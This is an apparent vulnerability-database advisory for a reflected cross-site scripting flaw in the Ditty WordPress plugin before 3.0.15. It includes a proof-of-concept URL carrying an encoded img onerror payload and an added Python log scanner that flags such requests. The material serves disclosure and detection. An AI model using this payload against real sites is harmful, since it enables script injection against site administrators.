WordPress Plugin Vulnerabilities
Ditty (formerly Ditty News Ticker) < 3.0.15 - Reflected Cross-Site Scripting (XSS)
Description
The plugin is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.
Proof of Concept
http://127.0.0.1:8001/wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%281%29%3E
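A way to look for requests shaped like the proof of concept above in web server access logs, as an added example that is not part of the original advisory or the plugin's code. The log lines are constructed samples, the tab value "general" is made up, and the rule that a legitimate tab value is a plain slug is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Feb/2022:10:00:01 +0000] "GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=general HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Feb/2022:10:00:05 +0000] "GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%281%29%3E HTTP/1.1" 200 5230',
    '203.0.113.9 - - [09/Feb/2022:10:01:00 +0000] "GET /wp-admin/edit.php?post_type=post&tab=%3Cb%3E HTTP/1.1" 200 4100',
    '203.0.113.9 - - [09/Feb/2022:10:02:00 +0000] "GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings HTTP/1.1" 200 5100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate tab identifiers are plain slugs (letters, digits, _ and -).
SAFE_TAB_RE = re.compile(r'^[A-Za-z0-9_-]*$')


def suspicious_tab_value(log_line):
    """Return the decoded `tab` value when the line is a request to the Ditty
    settings page and `tab` is not a plain slug; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith('/wp-admin/edit.php'):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get('page') != ['ditty_settings']:
        return None
    for value in params.get('tab', []):
        if not SAFE_TAB_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_tab_value) for every flagged line."""
    return [(number, value) for number, line in enumerate(lines, 1)
            if (value := suspicious_tab_value(line)) is not None]


if __name__ == '__main__':
    for number, value in scan(SAMPLE_LOG):
        print(f'line {number}: suspicious tab value {value!r}')
```

A hit only shows that such a URL was requested; whether the value was reflected unescaped depends on the installed plugin version (the advisory covers versions before 3.0.15).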
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-09
Added
2022-02-09
Last Updated
2022-04-08